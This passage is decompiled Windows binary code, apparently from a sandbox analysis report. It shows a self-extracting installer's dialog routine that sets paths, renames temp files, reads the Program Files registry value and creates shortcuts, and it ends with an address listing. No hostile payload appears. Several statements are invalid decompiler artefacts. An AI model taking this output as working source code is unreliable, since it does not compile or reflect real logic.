                                                                                                                                                  						}
                                                                                                                                                  						if(_v8 > 0xc) {
                                                                                                                                                  							goto L155;
                                                                                                                                                  						}
                                                                                                                                                  						switch( *((intOrPtr*)(_v8 * 4 +  &M0040CA61))) {
                                                                                                                                                  							case 0:
                                                                                                                                                  								__eflags = _a12 - 2;
                                                                                                                                                  								if(_a12 != 2) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								GetCurrentDirectoryA(0x400,  &_v1080);
                                                                                                                                                  								E0040A477( &_v3128,  &_v1080);
                                                                                                                                                  								E004076C8( &_v3128);
                                                                                                                                                  								E0040A5E2( &_v3128,  &_v7224);
                                                                                                                                                  								E00405BAD( &_v16608);
                                                                                                                                                  								E00405BDD( &_v16608,  &_v3128);
                                                                                                                                                  								E00403556( &_v12504);
                                                                                                                                                  								_push(0);
                                                                                                                                                  								_t314 =  &_v16608;
                                                                                                                                                  								_t265 = E00405FAD( &_v16608, _t316,  &_v12504);
                                                                                                                                                  								__eflags = _t265;
                                                                                                                                                  								if(_t265 == 0) {
                                                                                                                                                  									L29:
                                                                                                                                                  									E00405BCA( &_v16608);
                                                                                                                                                  									goto L155;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t309 = "%s.%d.tmp";
                                                                                                                                                  									do {
                                                                                                                                                  										SetFileAttributesA( &_v12504, 0);
                                                                                                                                                  										__eflags = _v9416;
                                                                                                                                                  										if(_v9416 == 0) {
                                                                                                                                                  											L20:
                                                                                                                                                  											_t270 = GetFileAttributesA( &_v12504);
                                                                                                                                                  											__eflags = _t270 - 0xffffffff;
                                                                                                                                                  											if(_t270 == 0xffffffff) {
                                                                                                                                                  												goto L28;
                                                                                                                                                  											}
                                                                                                                                                  											_t274 = DeleteFileA( &_v12504);
                                                                                                                                                  											__eflags = _t274;
                                                                                                                                                  											if(_t274 != 0) {
                                                                                                                                                  												goto L28;
                                                                                                                                                  											} else {
                                                                                                                                                  												_v8 = _v8 & _t274;
                                                                                                                                                  												_push(_t274);
                                                                                                                                                  												goto L24;
                                                                                                                                                  												L24:
                                                                                                                                                  												wsprintfA( &_v2104, _t309,  &_v12504);
                                                                                                                                                  												_t326 = _t326 + 0x10;
                                                                                                                                                  												_t279 = GetFileAttributesA( &_v2104);
                                                                                                                                                  												__eflags = _t279 - 0xffffffff;
                                                                                                                                                  												if(_t279 != 0xffffffff) {
                                                                                                                                                  													_t66 =  &_v8;
                                                                                                                                                  													 *_t66 = _v8 + 1;
                                                                                                                                                  													__eflags =  *_t66;
                                                                                                                                                  													_push(_v8);
                                                                                                                                                  													goto L24;
                                                                                                                                                  												} else {
                                                                                                                                                  													_t282 = MoveFileA( &_v12504,  &_v2104);
                                                                                                                                                  													__eflags = _t282;
                                                                                                                                                  													if(_t282 != 0) {
                                                                                                                                                  														_t283 = E00406EA5();
                                                                                                                                                  														__eflags = _t283;
                                                                                                                                                  														if(_t283 != 0) {
                                                                                                                                                  															MoveFileExA( &_v2104, 0, 4);
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  													goto L28;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = E00406EA5() - 4;
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											goto L20;
                                                                                                                                                  										}
                                                                                                                                                  										E00407300(_t314, __eflags,  &_v1080,  &_v8248);
                                                                                                                                                  										E004076C8( &_v8248);
                                                                                                                                                  										_t293 = E0040A384(_t314,  &_v1080);
                                                                                                                                                  										_v16 = _t293;
                                                                                                                                                  										__eflags = _t293 - 4;
                                                                                                                                                  										if(_t293 < 4) {
                                                                                                                                                  											L18:
                                                                                                                                                  											_t295 = E00407279(_t314,  &_v7224, 0);
                                                                                                                                                  											__eflags = _t295;
                                                                                                                                                  											if(_t295 != 0) {
                                                                                                                                                  												goto L29;
                                                                                                                                                  											}
                                                                                                                                                  											L19:
                                                                                                                                                  											 *((char*)(_t325 + E0040A384(_t314,  &_v12504) - 0x30d3)) = 0;
                                                                                                                                                  											E0040A289(_t314,  &_v56, 0, 0x1e);
                                                                                                                                                  											_push(0x14);
                                                                                                                                                  											_pop(_t300);
                                                                                                                                                  											_v56.fFlags = _t300;
                                                                                                                                                  											_v56.pFrom =  &_v12504;
                                                                                                                                                  											_v56.wFunc = 3;
                                                                                                                                                  											SHFileOperationA( &_v56);
                                                                                                                                                  											goto L20;
                                                                                                                                                  										}
                                                                                                                                                  										_t305 = E0040A384(_t314,  &_v8248);
                                                                                                                                                  										__eflags = _v16 - _t305;
                                                                                                                                                  										if(_v16 > _t305) {
                                                                                                                                                  											goto L19;
                                                                                                                                                  										}
                                                                                                                                                  										goto L18;
                                                                                                                                                  										L28:
                                                                                                                                                  										_push(0);
                                                                                                                                                  										_t314 =  &_v16608;
                                                                                                                                                  										_t272 = E00405FAD( &_v16608, _t316,  &_v12504);
                                                                                                                                                  										__eflags = _t272;
                                                                                                                                                  									} while (_t272 != 0);
                                                                                                                                                  									goto L29;
                                                                                                                                                  								}
                                                                                                                                                  							case 1:
                                                                                                                                                  								__eflags = _a12;
                                                                                                                                                  								if(_a12 == 0) {
                                                                                                                                                  									__eax =  *0x41a81c;
                                                                                                                                                  									__eflags =  *0x41a81c;
                                                                                                                                                  									__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                  									__eflags = __bl;
                                                                                                                                                  									if(__bl == 0) {
                                                                                                                                                  										__eax = E0040A5E2(__eax, "<br>");
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _v9;
                                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                                  										__esi =  &_a8;
                                                                                                                                                  										__edi = E0040B7BA( &_a8, __eflags);
                                                                                                                                                  									} else {
                                                                                                                                                  										__edi =  &_v7224;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __bl;
                                                                                                                                                  									if(__bl == 0) {
                                                                                                                                                  										__esi = E0040A384(__ecx,  *0x41a81c);
                                                                                                                                                  									} else {
                                                                                                                                                  										__esi = 0;
                                                                                                                                                  									}
                                                                                                                                                  									E0040A384(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                  									__eax = E0040A224( *0x41a81c, __eax);
                                                                                                                                                  									 *0x41a81c = __eax;
                                                                                                                                                  									__eflags = __bl;
                                                                                                                                                  									if(__bl != 0) {
                                                                                                                                                  										 *__eax = 0;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = E0040A5E2(__eax, __edi);
                                                                                                                                                  									__eflags = _v9;
                                                                                                                                                  									if(_v9 == 0) {
                                                                                                                                                  										__eax = E0040A205(__edi);
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								goto L155;
                                                                                                                                                  							case 2:
                                                                                                                                                  								__eflags = _a12;
                                                                                                                                                  								if(_a12 == 0) {
                                                                                                                                                  									 &_v7224 = SetWindowTextA(_a4,  &_v7224); // executed
                                                                                                                                                  								}
                                                                                                                                                  								goto L155;
                                                                                                                                                  							case 3:
                                                                                                                                                  								__eflags = _a12;
                                                                                                                                                  								if(_a12 != 0) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags =  *0x419f92;
                                                                                                                                                  								if( *0x419f92 != 0) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _v7224 - 0x22;
                                                                                                                                                  								__esi =  &_v7224;
                                                                                                                                                  								_v1080 = 0;
                                                                                                                                                  								if(_v7224 == 0x22) {
                                                                                                                                                  									__esi =  &_v7223;
                                                                                                                                                  								}
                                                                                                                                                  								__eax = E0040A384(__ecx, __esi);
                                                                                                                                                  								__eflags = __eax - 0x400;
                                                                                                                                                  								if(__eax >= 0x400) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								} else {
                                                                                                                                                  									__al = __esi->i;
                                                                                                                                                  									__eflags = __al - 0x2e;
                                                                                                                                                  									if(__al != 0x2e) {
                                                                                                                                                  										L59:
                                                                                                                                                  										__eflags = __al - 0x5c;
                                                                                                                                                  										if(__al == 0x5c) {
                                                                                                                                                  											L53:
                                                                                                                                                  											 &_v1080 = E0040A477( &_v1080, __esi);
                                                                                                                                                  											L54:
                                                                                                                                                  											__eax =  &_v1080;
                                                                                                                                                  											__eax = E0040A3D9(__ecx,  &_v1080, 0x22);
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                  												__eflags =  *((char*)(__eax + 1));
                                                                                                                                                  												if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                  													 *__eax = 0;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											 &_v1080 = E0040A477(__ebx,  &_v1080);
                                                                                                                                                  											 &_v1080 = E0040B9B0(__esi,  &_v1080); // executed
                                                                                                                                                  											__esi = GetDlgItem(_a4, 0x65);
                                                                                                                                                  											 &_v1080 = SetWindowTextA(__esi,  &_v1080); // executed
                                                                                                                                                  											__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                  											__eax =  &_v1080;
                                                                                                                                                  											__eax = E0040A4E9(__ebx,  &_v1080);
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                  												 &_v1080 = SendMessageA(__esi, 0x143, 0,  &_v1080);
                                                                                                                                                  											}
                                                                                                                                                  											goto L155;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __al;
                                                                                                                                                  										if(__al == 0) {
                                                                                                                                                  											L62:
                                                                                                                                                  											__eax =  &_v20;
                                                                                                                                                  											__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v20);
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												 &_v16 =  &_v1080;
                                                                                                                                                  												__eax =  &_v24;
                                                                                                                                                  												_v16 = 0x400;
                                                                                                                                                  												RegQueryValueExA(_v20, "ProgramFilesDir", 0,  &_v24,  &_v1080,  &_v16) = RegCloseKey(_v20);
                                                                                                                                                  											}
                                                                                                                                                  											__eflags = _v1080;
                                                                                                                                                  											if(_v1080 != 0) {
                                                                                                                                                  												__eax =  &_v1080;
                                                                                                                                                  												__eax = E0040A384(__ecx,  &_v1080);
                                                                                                                                                  												__ecx =  &_v1080;
                                                                                                                                                  												__ecx =  &_v1080 - 1;
                                                                                                                                                  												__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                  												if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                  													 &_v1080 = E0040A5E2( &_v1080, "\\");
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											__edi = E0040A384(__ecx, __esi);
                                                                                                                                                  											__eax =  &_v1080;
                                                                                                                                                  											__edi = __edi + E0040A384(__ecx,  &_v1080);
                                                                                                                                                  											__eflags = __edi - 0x3ff;
                                                                                                                                                  											if(__edi < 0x3ff) {
                                                                                                                                                  												 &_v1080 = E0040A5E2( &_v1080, __esi);
                                                                                                                                                  											}
                                                                                                                                                  											goto L54;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __esi->i - 0x3a;
                                                                                                                                                  										if(__esi->i == 0x3a) {
                                                                                                                                                  											goto L53;
                                                                                                                                                  										}
                                                                                                                                                  										goto L62;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __esi->i - 0x5c;
                                                                                                                                                  									if(__esi->i != 0x5c) {
                                                                                                                                                  										goto L59;
                                                                                                                                                  									}
                                                                                                                                                  									__esi =  &(__esi->i);
                                                                                                                                                  									__eflags = __esi;
                                                                                                                                                  									goto L53;
                                                                                                                                                  								}
                                                                                                                                                  							case 4:
                                                                                                                                                  								__eflags =  *0x419f8c - 1;
                                                                                                                                                  								__eflags = __eax - 0x419f8c;
                                                                                                                                                  								 *__edi =  *__edi + __ecx;
                                                                                                                                                  								__eflags = _a1 & __cl;
                                                                                                                                                  								 *__eax =  *__eax + __al;
                                                                                                                                                  								__eflags =  *__eax;
                                                                                                                                                  							case 5:
                                                                                                                                                  								__eax = _v7224;
                                                                                                                                                  								__eax = _v7224;
                                                                                                                                                  								__eflags = __eax;
                                                                                                                                                  								if(__eax == 0) {
                                                                                                                                                  									L81:
                                                                                                                                                  									 *0x419edf = 0;
                                                                                                                                                  									 *0x419ede = 1;
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								__eax = __eax - 0x30;
                                                                                                                                                  								__eflags = __eax;
                                                                                                                                                  								if(__eax == 0) {
                                                                                                                                                  									 *0x419edf = 0;
                                                                                                                                                  									L80:
                                                                                                                                                  									 *0x419ede = 0;
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								__eax = __eax - 1;
                                                                                                                                                  								__eflags = __eax;
                                                                                                                                                  								if(__eax == 0) {
                                                                                                                                                  									goto L81;
                                                                                                                                                  								}
                                                                                                                                                  								__eax = __eax - 1;
                                                                                                                                                  								__eflags = __eax;
                                                                                                                                                  								if(__eax != 0) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								 *0x419edf = 1;
                                                                                                                                                  								goto L80;
                                                                                                                                                  							case 6:
                                                                                                                                                  								__eflags = _a12 - 4;
                                                                                                                                                  								if(_a12 != 4) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								_push(0);
                                                                                                                                                  								goto L89;
                                                                                                                                                  							case 7:
                                                                                                                                                  								__eflags = _a12 - 1;
                                                                                                                                                  								if(_a12 != 1) {
                                                                                                                                                  									L106:
                                                                                                                                                  									__eflags = _a12 - 7;
                                                                                                                                                  									if(_a12 == 7) {
                                                                                                                                                  										__eflags =  *0x419f8c;
                                                                                                                                                  										if( *0x419f8c == 0) {
                                                                                                                                                  											 *0x419f8c = 2;
                                                                                                                                                  										}
                                                                                                                                                  										 *0x419f88 = 1;
                                                                                                                                                  									}
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								 &_v3128 = GetTempPathA(0x400,  &_v3128);
                                                                                                                                                  								 &_v3128 = E004076C8( &_v3128);
                                                                                                                                                  								_v8 = _v8 & 0x00000000;
                                                                                                                                                  								_push(0);
                                                                                                                                                  								__ebx = "%s%s%d";
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_push( *0x41409c);
                                                                                                                                                  									__eax =  &_v3128;
                                                                                                                                                  									_push( &_v3128);
                                                                                                                                                  									__eax =  &_v2104;
                                                                                                                                                  									_push(__ebx);
                                                                                                                                                  									_push( &_v2104);
                                                                                                                                                  									__eax =  *__edi();
                                                                                                                                                  									__esp = __esp + 0x14;
                                                                                                                                                  									__eax =  &_v2104;
                                                                                                                                                  									_push( &_v2104);
                                                                                                                                                  									__eax = __esi->i();
                                                                                                                                                  									__eflags = __eax - 0xffffffff;
                                                                                                                                                  									if(__eax == 0xffffffff) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t134 =  &_v8;
                                                                                                                                                  									 *_t134 = _v8 + 1;
                                                                                                                                                  									__eflags =  *_t134;
                                                                                                                                                  									_push(_v8);
                                                                                                                                                  								}
                                                                                                                                                  								 &_v2104 = SetDlgItemTextA(_a4, 0x65,  &_v2104);
                                                                                                                                                  								__eflags = _v7224;
                                                                                                                                                  								if(_v7224 == 0) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags =  *0x41a816;
                                                                                                                                                  								if( *0x41a816 != 0) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								__eax =  &_v7224;
                                                                                                                                                  								_v568 = 0;
                                                                                                                                                  								__eax = E0040A3AD( &_v7224, 0x2c);
                                                                                                                                                  								__eflags = __eax;
                                                                                                                                                  								if(__eax != 0) {
                                                                                                                                                  									L102:
                                                                                                                                                  									__eflags = _v568;
                                                                                                                                                  									if(_v568 == 0) {
                                                                                                                                                  										 &_v46304 =  &_v7224;
                                                                                                                                                  										E0040A477( &_v7224,  &_v46304) =  &_v42208;
                                                                                                                                                  										 &_v568 = E0040A477( &_v568,  &_v42208);
                                                                                                                                                  									}
                                                                                                                                                  									 &_v7224 = E0040ABA1( &_v7224);
                                                                                                                                                  									 &_v568 =  &_v7224;
                                                                                                                                                  									_v5176 = 0;
                                                                                                                                                  									__eax = MessageBoxA(_a4,  &_v7224,  &_v568, 0x24);
                                                                                                                                                  									__eflags = __eax - 6;
                                                                                                                                                  									if(__eax == 6) {
                                                                                                                                                  										goto L155;
                                                                                                                                                  									} else {
                                                                                                                                                  										0 = 1;
                                                                                                                                                  										__eflags = 1;
                                                                                                                                                  										 *0x41a815 = 1;
                                                                                                                                                  										 *0x419f78 = 1;
                                                                                                                                                  										__eax = EndDialog(_a4, 1);
                                                                                                                                                  										goto L106;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								__esi = 0;
                                                                                                                                                  								__eflags = _v7224;
                                                                                                                                                  								if(_v7224 == 0) {
                                                                                                                                                  									goto L102;
                                                                                                                                                  								} else {
                                                                                                                                                  									goto L98;
                                                                                                                                                  								}
                                                                                                                                                  								while(1) {
                                                                                                                                                  									L98:
                                                                                                                                                  									__eflags =  *((char*)(__ebp + __esi - 0x1c34)) - 0x40;
                                                                                                                                                  									if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									__esi =  &(__esi->i);
                                                                                                                                                  									__eflags =  *((char*)(__ebp + __esi - 0x1c34));
                                                                                                                                                  									if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                  										continue;
                                                                                                                                                  									}
                                                                                                                                                  									goto L102;
                                                                                                                                                  								}
                                                                                                                                                  								__ebp + __esi - 0x1c33 =  &_v568;
                                                                                                                                                  								__eax = E0040A477( &_v568, __ebp + __esi - 0x1c33);
                                                                                                                                                  								 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                  								goto L102;
                                                                                                                                                  							case 8:
                                                                                                                                                  								__eflags = _a12 - 3;
                                                                                                                                                  								if(_a12 == 3) {
                                                                                                                                                  									__eflags = _v7224;
                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                  										 &_v7224 = SetWindowTextA(_a4,  &_v7224);
                                                                                                                                                  									}
                                                                                                                                                  									__esi =  &_a8;
                                                                                                                                                  									 *0x41a820 = E0040B7BA(__esi, __eflags);
                                                                                                                                                  								}
                                                                                                                                                  								 *0x41a817 = 1;
                                                                                                                                                  								goto L155;
                                                                                                                                                  							case 9:
                                                                                                                                                  								__eflags = _a12 - 5;
                                                                                                                                                  								if(_a12 != 5) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								_push(1);
                                                                                                                                                  								L89:
                                                                                                                                                  								 &_v7224 = E0040BD80( &_v7224, __ecx); // executed
                                                                                                                                                  								goto L155;
                                                                                                                                                  							case 0xa:
                                                                                                                                                  								__eflags = _a12 - 6;
                                                                                                                                                  								if(_a12 != 6) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								__eax = _v46304;
                                                                                                                                                  								__eax = E0040A250(__ecx, _v46304);
                                                                                                                                                  								__eax = __eax - 0x50;
                                                                                                                                                  								__eflags = __eax;
                                                                                                                                                  								if(__eax == 0) {
                                                                                                                                                  									_v8 = 2;
                                                                                                                                                  								} else {
                                                                                                                                                  									__eax = __eax - 3;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										_v8 = 0xb;
                                                                                                                                                  									} else {
                                                                                                                                                  										__eax = __eax - 1;
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax == 0) {
                                                                                                                                                  											_v8 = 7;
                                                                                                                                                  										} else {
                                                                                                                                                  											_v8 = 0x10;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								 &_v42208 =  &_v3128;
                                                                                                                                                  								_v8248 = 0;
                                                                                                                                                  								_v2104 = 0;
                                                                                                                                                  								__eax = E0040A477( &_v3128,  &_v42208);
                                                                                                                                                  								__eflags = _v3128 - 0x22;
                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                  									 &_v3128 = E00405767(__eflags,  &_v3128, 0);
                                                                                                                                                  									__eflags = __al;
                                                                                                                                                  									if(__al != 0) {
                                                                                                                                                  										goto L142;
                                                                                                                                                  									}
                                                                                                                                                  									__edi = 0;
                                                                                                                                                  									__eflags = _v3128;
                                                                                                                                                  									__esi =  &_v3128;
                                                                                                                                                  									if(_v3128 == 0) {
                                                                                                                                                  										goto L142;
                                                                                                                                                  									} else {
                                                                                                                                                  										goto L130;
                                                                                                                                                  									}
                                                                                                                                                  									do {
                                                                                                                                                  										L130:
                                                                                                                                                  										__bl = __esi->i;
                                                                                                                                                  										__eflags = __bl - 0x20;
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											L132:
                                                                                                                                                  											__eax =  &_v3128;
                                                                                                                                                  											__esi->i = 0;
                                                                                                                                                  											__eax = E00405767(__eflags,  &_v3128, 0);
                                                                                                                                                  											__eflags = __al;
                                                                                                                                                  											if(__al == 0) {
                                                                                                                                                  												__esi->i = __bl;
                                                                                                                                                  												goto L139;
                                                                                                                                                  											}
                                                                                                                                                  											__edi = __esi;
                                                                                                                                                  											__eflags = __bl - 0x2f;
                                                                                                                                                  											if(__bl != 0x2f) {
                                                                                                                                                  												do {
                                                                                                                                                  													__esi =  &(__esi->i);
                                                                                                                                                  													__eflags = __esi->i - 0x20;
                                                                                                                                                  												} while (__esi->i == 0x20);
                                                                                                                                                  												_push(__esi);
                                                                                                                                                  												__eax =  &_v2104;
                                                                                                                                                  												L137:
                                                                                                                                                  												_push(__eax);
                                                                                                                                                  												__eax = E0040A477();
                                                                                                                                                  												 *__edi = __bl;
                                                                                                                                                  												goto L139;
                                                                                                                                                  											}
                                                                                                                                                  											_t192 =  &(__esi->i); // 0x1
                                                                                                                                                  											__eax = _t192;
                                                                                                                                                  											_push(_t192);
                                                                                                                                                  											_v2104 = __bl;
                                                                                                                                                  											__eax =  &_v2103;
                                                                                                                                                  											goto L137;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __bl - 0x2f;
                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                  											goto L139;
                                                                                                                                                  										}
                                                                                                                                                  										goto L132;
                                                                                                                                                  										L139:
                                                                                                                                                  										__esi =  &(__esi->i);
                                                                                                                                                  										__eflags = __esi->i;
                                                                                                                                                  									} while (__esi->i != 0);
                                                                                                                                                  									__eflags = __edi;
                                                                                                                                                  									if(__edi != 0) {
                                                                                                                                                  										 *__edi = 0;
                                                                                                                                                  									}
                                                                                                                                                  									goto L142;
                                                                                                                                                  								} else {
                                                                                                                                                  									 &_v42207 =  &_v3128;
                                                                                                                                                  									E0040A477( &_v3128,  &_v42207) =  &_v3127;
                                                                                                                                                  									__eax = E004073AB( &_v3127, 0x22);
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax != 0) {
                                                                                                                                                  										 *__eax = 0;
                                                                                                                                                  										 &_v2104 = E0040A477( &_v2104,  &_v2104);
                                                                                                                                                  									}
                                                                                                                                                  									L142:
                                                                                                                                                  									__eflags = _v25824;
                                                                                                                                                  									if(_v25824 != 0) {
                                                                                                                                                  										 &_v8248 =  &_v25824;
                                                                                                                                                  										__eax = E00405822( &_v25824,  &_v8248);
                                                                                                                                                  									}
                                                                                                                                                  									 &_v17632 =  &_v3128;
                                                                                                                                                  									E00405822( &_v3128,  &_v17632) =  &_v1080;
                                                                                                                                                  									__eax = E0040AAC2(__ecx,  &_v1080, _v8); // executed
                                                                                                                                                  									 &_v1080 = E004076C8( &_v1080);
                                                                                                                                                  									__eflags = _v38112;
                                                                                                                                                  									if(_v38112 != 0) {
                                                                                                                                                  										 &_v38112 =  &_v1080;
                                                                                                                                                  										E0040A5E2( &_v1080,  &_v38112) =  &_v1080;
                                                                                                                                                  										__eax = E004076C8( &_v1080);
                                                                                                                                                  									}
                                                                                                                                                  									 &_v1080 =  &_v13528;
                                                                                                                                                  									__eax = E0040A477( &_v13528,  &_v1080);
                                                                                                                                                  									__eflags = _v29920;
                                                                                                                                                  									__eax =  &_v29920;
                                                                                                                                                  									if(_v29920 == 0) {
                                                                                                                                                  										__eax =  &_v42208;
                                                                                                                                                  									}
                                                                                                                                                  									 &_v1080 = E0040A5E2( &_v1080,  &_v1080);
                                                                                                                                                  									__eax =  &_v1080;
                                                                                                                                                  									__eax = E00407690( &_v1080);
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										L150:
                                                                                                                                                  										 &_v1080 = E0040A5E2( &_v1080, ".lnk");
                                                                                                                                                  										goto L151;
                                                                                                                                                  									} else {
                                                                                                                                                  										__eax = E0040A59A(__eax, ".lnk");
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax == 0) {
                                                                                                                                                  											L151:
                                                                                                                                                  											 &_v1080 = E004058FF(__ebx, __esi,  &_v1080, 0, 1); // executed
                                                                                                                                                  											_v2104 =  ~_v2104;
                                                                                                                                                  											asm("sbb eax, eax");
                                                                                                                                                  											__ecx =  &_v2104;
                                                                                                                                                  											 ~_v2104 &  &_v2104 = _v8248;
                                                                                                                                                  											__eax =  ~_v8248;
                                                                                                                                                  											asm("sbb eax, eax");
                                                                                                                                                  											__ecx =  &_v8248;
                                                                                                                                                  											 ~_v8248 &  &_v8248 = _v34016;
                                                                                                                                                  											__eax =  ~_v34016;
                                                                                                                                                  											asm("sbb eax, eax");
                                                                                                                                                  											__ecx =  &_v34016;
                                                                                                                                                  											 ~_v34016 &  &_v34016 =  &_v1080;
                                                                                                                                                  											 &_v17632 = E0040A9BD( &_v17632,  &_v1080,  ~_v34016 &  &_v34016,  ~_v8248 &  &_v8248,  ~_v2104 &  &_v2104); // executed
                                                                                                                                                  											__eflags = _v13528;
                                                                                                                                                  											if(_v13528 != 0) {
                                                                                                                                                  												__eax =  &_v13528;
                                                                                                                                                  												SHChangeNotify(0x1000, 1,  &_v13528, 0); // executed
                                                                                                                                                  											}
                                                                                                                                                  											goto L155;
                                                                                                                                                  										}
                                                                                                                                                  										goto L150;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							case 0xb:
                                                                                                                                                  								__eflags = _a12 - 7;
                                                                                                                                                  								if(_a12 == 7) {
                                                                                                                                                  									 *0x419f90 = 1;
                                                                                                                                                  								}
                                                                                                                                                  								goto L155;
                                                                                                                                                  							case 0xc:
                                                                                                                                                  								__eax = _v7224;
                                                                                                                                                  								__eax = E0040A250(__ecx, _v7224);
                                                                                                                                                  								__eflags = __eax - 0x46;
                                                                                                                                                  								if(__eax == 0x46) {
                                                                                                                                                  									 *0x419edd = 1;
                                                                                                                                                  								} else {
                                                                                                                                                  									__eflags = __eax - 0x55;
                                                                                                                                                  									if(__eax == 0x55) {
                                                                                                                                                  										 *0x419edc = 1;
                                                                                                                                                  									} else {
                                                                                                                                                  										 *0x419edd = 0;
                                                                                                                                                  										 *0x419edc = 0;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								goto L155;
                                                                                                                                                  						}
                                                                                                                                                  						L4:
                                                                                                                                                  						E0040A925( &_v7224, _v8);
                                                                                                                                                  						_v8 = _v8 + 0x1000;
                                                                                                                                                  						_t15 =  &_v16;
                                                                                                                                                  						 *_t15 = _v16 - 1;
                                                                                                                                                  						if( *_t15 != 0) {
                                                                                                                                                  							goto L4;
                                                                                                                                                  						} else {
                                                                                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						L155:
                                                                                                                                                  						_t240 = E0040B613(0x1000, _t323, _a8,  &_v21728,  &_v7224,  &_v9,  &_a11);
                                                                                                                                                  						_a8 = _t240;
                                                                                                                                                  					} while (_t240 != 0);
                                                                                                                                                  					goto L157;
                                                                                                                                                  				}
                                                                                                                                                  			}





































                                                                                                                                                  0x0040bf99
                                                                                                                                                  0x0040bfa1
                                                                                                                                                  0x0040bfaa
                                                                                                                                                  0x0040ca5c
                                                                                                                                                  0x0040ca5c
                                                                                                                                                  0x0040bfcf
                                                                                                                                                  0x0040bfd4
                                                                                                                                                  0x0040bfd9
                                                                                                                                                  0x0040ca5a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bfdf
                                                                                                                                                  0x0040bfe0
                                                                                                                                                  0x0040bfe1
                                                                                                                                                  0x0040bfe1
                                                                                                                                                  0x0040bffe
                                                                                                                                                  0x0040c001
                                                                                                                                                  0x0040c001
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c021
                                                                                                                                                  0x0040c03c
                                                                                                                                                  0x0040c043
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c045
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c045
                                                                                                                                                  0x0040c043
                                                                                                                                                  0x0040c04e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c057
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c05e
                                                                                                                                                  0x0040c062
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c074
                                                                                                                                                  0x0040c088
                                                                                                                                                  0x0040c094
                                                                                                                                                  0x0040c0a7
                                                                                                                                                  0x0040c0b2
                                                                                                                                                  0x0040c0c4
                                                                                                                                                  0x0040c0cf
                                                                                                                                                  0x0040c0d4
                                                                                                                                                  0x0040c0dd
                                                                                                                                                  0x0040c0e3
